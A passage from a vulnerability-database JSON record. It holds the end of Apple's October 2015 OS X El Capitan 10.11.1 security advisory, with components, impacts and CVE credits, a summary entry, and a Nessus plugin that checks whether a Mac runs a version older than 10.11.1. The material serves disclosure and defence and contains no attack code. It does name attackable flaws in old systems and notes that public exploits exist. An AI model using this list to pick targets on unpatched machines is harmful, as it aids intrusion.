spoof\r\nresponses from the local configd service may have been able to cause\r\narbitrary code execution in DNS clients.\r\nCVE-ID\r\nCVE-2015-7015 : PanguTeam\r\n\r\nCoreGraphics\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: Multiple memory corruption issues existed in\r\nCoreGraphics. These issues were addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5925 : Apple\r\nCVE-2015-5926 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6992 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6975 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-7017 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-5944 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nDisk Images\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in the parsing of\r\ndisk images. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6995 : Ian Beer of Google Project Zero\r\n\r\nEFI\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: An attacker can exercise unused EFI functions\r\nDescription: An issue existed with EFI argument handling. This was\r\naddressed by removing the affected functions.\r\nCVE-ID\r\nCVE-2015-7035 : Corey Kallenberg, Xeno Kovah, John Butterworth, and\r\nSam Cornwell of The MITRE Corporation, coordinated via CERT/CC\r\n\r\nFile Bookmark\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Browsing to a folder with malformed bookmarks may cause\r\nunexpected application termination\r\nDescription: An input validation issue existed in parsing bookmark\r\nmetadata. This issue was addressed through improved validation\r\nchecks.\r\nCVE-ID\r\nCVE-2015-6987 : Luca Todesco (@qwertyoruiop)\r\n\r\nFontParser\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-5927 : Apple\r\nCVE-2015-5942\r\nCVE-2015-6976 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6977 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero\r\nDay Initiative\r\nCVE-2015-6991 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6993 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7009 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7010 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7018 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nFontParser\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6990 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7008 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nGrand Central Dispatch\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted package may lead to\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in the handling of\r\ndispatch calls. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6989 : Apple\r\n\r\nGraphics Drivers\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to cause unexpected system\r\ntermination or read kernel memory\r\nDescription: Multiple out of bounds read issues existed in the\r\nNVIDIA graphics driver. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-7019 : Ian Beer of Google Project Zero\r\nCVE-2015-7020 : Moony Li of Trend Micro\r\n\r\nGraphics Drivers\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-7021 : Moony Li of Trend Micro\r\n\r\nImageIO\r\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\r\nImpact: Processing a maliciously crafted image file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nparsing of image metadata. These issues were addressed through\r\nimproved metadata validation.\r\nCVE-ID\r\nCVE-2015-5935 : Apple\r\nCVE-2015-5938 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted image file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nparsing of image metadata. These issues were addressed through\r\nimproved metadata validation.\r\nCVE-ID\r\nCVE-2015-5936 : Apple\r\nCVE-2015-5937 : Apple\r\nCVE-2015-5939 : Apple\r\n\r\nIOAcceleratorFamily\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in\r\nIOAcceleratorFamily. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6996 : Ian Beer of Google Project Zero\r\n\r\nIOHIDFamily\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with kernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-6974 : Luca Todesco (@qwertyoruiop)\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10.5\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A type confusion issue existed in the validation of\r\nMach tasks. This issue was addressed through improved Mach task\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5932 : Luca Todesco (@qwertyoruiop), Filippo Bigarella\r\n\r\nKernel\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker with a privileged network position may be able\r\nto execute arbitrary code\r\nDescription: An uninitialized memory issue existed in the kernel.\r\nThis issue was addressed through improved memory initialization.\r\nCVE-ID\r\nCVE-2015-6988 : The Brainy Code Scanner (m00nbsd)\r\n\r\nKernel\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local application may be able to cause a denial of service\r\nDescription: An issue existed when reusing virtual memory. This\r\nissue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-6994 : Mark Mentovai of Google Inc.\r\n\r\nlibarchive\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: A malicious application may be able to overwrite arbitrary\r\nfiles\r\nDescription: An issue existed within the path validation logic for\r\nsymlinks. This issue was addressed through improved path\r\nsanitization.\r\nCVE-ID\r\nCVE-2015-6984 : Christopher Crone of Infinit, Jonathan Schleifer\r\n\r\nMCX Application Restrictions\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: A developer-signed executable may acquire restricted\r\nentitlements\r\nDescription: An entitlement validation issue existed in Managed\r\nConfiguration. A developer-signed app could bypass restrictions on\r\nuse of restricted entitlements and elevate privileges. This issue was\r\naddressed through improved provisioning profile validation.\r\nCVE-ID\r\nCVE-2015-7016 : Apple\r\n\r\nNet-SNMP\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker in a privileged network position may be able to\r\ncause a denial of service\r\nDescription: Multiple issues existed in netsnmp version 5.6. These\r\nissues were addressed by using patches affecting OS X from upstream.\r\nCVE-ID\r\nCVE-2012-6151\r\nCVE-2014-3565\r\n\r\nOpenGL\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A memory corruption issue existed in OpenGL. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5924 : Apple\r\n\r\nOpenSSH\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to conduct impersonation attacks\r\nDescription: A privilege separation issue existed in PAM support.\r\nThis issue was addressed with improved authorization checks.\r\nCVE-ID\r\nCVE-2015-6563 : Moritz Jodeit of Blue Frost Security GmbH\r\n\r\nSandbox\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: An input validation issue existed when handling NVRAM\r\nparameters. This issue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-5945 : Rich Trouton (@rtrouton), Howard Hughes Medical\r\nInstitute, Apple\r\n\r\nScript Editor\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker may trick a user into running arbitrary\r\nAppleScript\r\nDescription: In some circumstances, Script Editor did not ask for\r\nuser confirmation before executing AppleScripts. This issue was\r\naddressed by prompting for user confirmation before executing\r\nAppleScripts.\r\nCVE-ID\r\nCVE-2015-7007 : Joe Vennix of Rapid7\r\n\r\nSecurity\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to overwrite arbitrary\r\nfiles\r\nDescription: A double free issue existed in the handling of\r\nAtomicBufferedFile descriptors. This issue was addressed through\r\nimproved validation of AtomicBufferedFile descriptors.\r\nCVE-ID\r\nCVE-2015-6983 : David Benjamin, Greg Kerr, Mark Mentovai and Sergey\r\nUlanov from the Chrome Team\r\n\r\nSecurityAgent\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application can programmatically control\r\nkeychain access prompts\r\nDescription: A method existed for applications to create synthetic\r\nclicks on keychain prompts. This was addressed by disabling synthetic\r\nclicks for keychain access windows.\r\nCVE-ID\r\nCVE-2015-5943\r\n\r\nInstallation note:\r\n\r\nOS X El Capitan v10.11.1 includes the security content of\r\nSafari 9.0.1: https://support.apple.com/kb/HT205377\r\n\r\nOS X El Capitan 10.11.1 and Security Update 2015-007 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "modified": "2015-10-25T00:00:00", "published": "2015-10-25T00:00:00", "id": "SECURITYVULNS:DOC:32566", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32566", "title": "APPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update 2015-007", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-5883", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-5903", "CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-2783", "CVE-2015-5877", "CVE-2015-5927", "CVE-2015-3785", "CVE-2015-5847", "CVE-2014-9427", "CVE-2015-3329", "CVE-2015-6975", "CVE-2015-3415", "CVE-2015-7035", "CVE-2015-3330", "CVE-2015-6987", "CVE-2015-5922", "CVE-2015-5865", "CVE-2015-5869", "CVE-2015-5879", "CVE-2015-7003", "CVE-2015-5876", "CVE-2015-5858", "CVE-2015-5924", "CVE-2015-5862", "CVE-2015-0286", "CVE-2015-5888", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-5874", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-5860", "CVE-2015-1855", "CVE-2015-7020", "CVE-2014-3618", "CVE-2015-6994", "CVE-2015-1352", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-2301", "CVE-2015-7021", "CVE-2015-6977", "CVE-2015-5868", "CVE-2014-3565", "CVE-2015-5872", "CVE-2015-5839", "CVE-2015-5840", "CVE-2014-6277", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-2305", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5873", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-5875", "CVE-2015-5882", "CVE-2015-5842", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-5912", "CVE-2015-6985", "CVE-2015-2331", "CVE-2015-5870", "CVE-2015-5935", "CVE-2015-5722", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5841", "CVE-2015-5894", "CVE-2015-5881", "CVE-2014-2532", "CVE-2015-5831", "CVE-2014-8147", "CVE-2015-5937", "CVE-2015-5878", "CVE-2015-5855", "CVE-2015-7023", "CVE-2014-8611", "CVE-2015-6993", "CVE-2015-5871", "CVE-2015-5866", "CVE-2015-5901", "CVE-2014-8090", "CVE-2015-6836", "CVE-2015-5884", "CVE-2015-3416", "CVE-2015-5936", "CVE-2015-5889", "CVE-2015-5867", "CVE-2015-5836", "CVE-2015-6989", "CVE-2015-5915", "CVE-2015-5900", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-5890", "CVE-2014-7187", "CVE-2014-8146", "CVE-2015-5854", "CVE-2015-6990", "CVE-2015-3414", "CVE-2015-7009", "CVE-2014-9652", "CVE-2015-7031", "CVE-2015-6988", "CVE-2015-5523", "CVE-2015-5986", "CVE-2015-5943", "CVE-2015-5885", "CVE-2015-6996", "CVE-2015-6837", "CVE-2013-3951", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5893", "CVE-2015-5917", "CVE-2014-8080", "CVE-2015-1351", "CVE-2015-5524", "CVE-2015-5887", "CVE-2015-5902", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-0287", "CVE-2015-6974", "CVE-2015-5853", "CVE-2015-6835", "CVE-2015-5897", "CVE-2015-5830", "CVE-2015-5849", "CVE-2015-5896", "CVE-2015-5833", "CVE-2015-5863", "CVE-2015-0231", "CVE-2015-5864", "CVE-2014-7186", "CVE-2015-5891", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5914", "CVE-2015-5926", "CVE-2015-5522", "CVE-2015-5851", "CVE-2015-5899", "CVE-2015-6838", "CVE-2015-5933"], "description": "Code execution, information disclosure, restrictions bypass, multiple memory corruptions, multiple libraries vulnerabilities.", "edition": 1, "modified": "2015-10-25T00:00:00", "published": "2015-10-25T00:00:00", "id": "SECURITYVULNS:VULN:14702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14702", "title": "Apple Mac OS X / Mac EFI / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-03-01T03:40:08", "description": "The remote host is running a version of Mac OS X that is 10.9.5 or\nlater but prior to 10.11.1 It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273,\n CVE-2015-6834, CVE-2015-6835, CVE-2015-6836,\n CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992,\n CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976,\n CVE-2015-6977, CVE-2015-6978, CVE-2015-6990,\n CVE-2015-6991, CVE-2015-6993, CVE-2015-7008,\n CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020,\n CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937,\n CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "edition": 26, "published": "2015-10-29T00:00:00", "title": "Mac OS X < 10.11.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-6976", "CVE-2015-7007", "CVE-2015-6980", "CVE-2015-0235", "CVE-2015-5927", "CVE-2015-6975", "CVE-2015-7035", "CVE-2015-6987", "CVE-2015-7003", "CVE-2015-5924", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-7020", "CVE-2015-6994", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-7021", "CVE-2015-6977", "CVE-2014-3565", "CVE-2015-7024", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-6985", "CVE-2015-5935", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5937", "CVE-2015-7023", "CVE-2015-6993", "CVE-2015-6836", "CVE-2015-5936", "CVE-2015-6989", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-6990", "CVE-2015-7009", "CVE-2015-6988", "CVE-2015-5943", "CVE-2015-6996", "CVE-2015-6837", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-6974", "CVE-2015-6835", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5926", "CVE-2015-6838", "CVE-2015-5933"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_11_1.NASL", "href": "https://www.tenable.com/plugins/nessus/86654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86654);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2012-6151\",\n \"CVE-2014-3565\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5943\",\n \"CVE-2015-5944\",\n \"CVE-2015-5945\",\n \"CVE-2015-6563\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6974\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6980\",\n \"CVE-2015-6983\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6987\",\n \"CVE-2015-6988\",\n \"CVE-2015-6989\",\n \"CVE-2015-6990\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6994\",\n \"CVE-2015-6995\",\n \"CVE-2015-6996\",\n \"CVE-2015-7003\",\n \"CVE-2015-7006\",\n \"CVE-2015-7007\",\n \"CVE-2015-7008\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7015\",\n \"CVE-2015-7016\",\n \"CVE-2015-7017\",\n \"CVE-2015-7018\",\n \"CVE-2015-7019\",\n \"CVE-2015-7020\",\n \"CVE-2015-7021\",\n \"CVE-2015-7023\",\n \"CVE-2015-7024\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 64048,\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X < 10.11.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.9.5 or\nlater but prior to 10.11.1 It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273,\n CVE-2015-6834, CVE-2015-6835, CVE-2015-6836,\n CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992,\n CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976,\n CVE-2015-6977, CVE-2015-6978, CVE-2015-6990,\n CVE-2015-6991, CVE-2015-6993, CVE-2015-7008,\n CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020,\n CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937,\n CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X 10.11.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari User-Assisted Applescript Exec Attack');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Cannot determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\n\nif (\n version !~ \"^10\\.11([^0-9]|$)\"\n) audit(AUDIT_OS_NOT, \"Mac OS X 10.11 or later\", \"Mac OS X \"+version);\n\nfixed_version = \"10.11.1\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X \"+version+\".\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
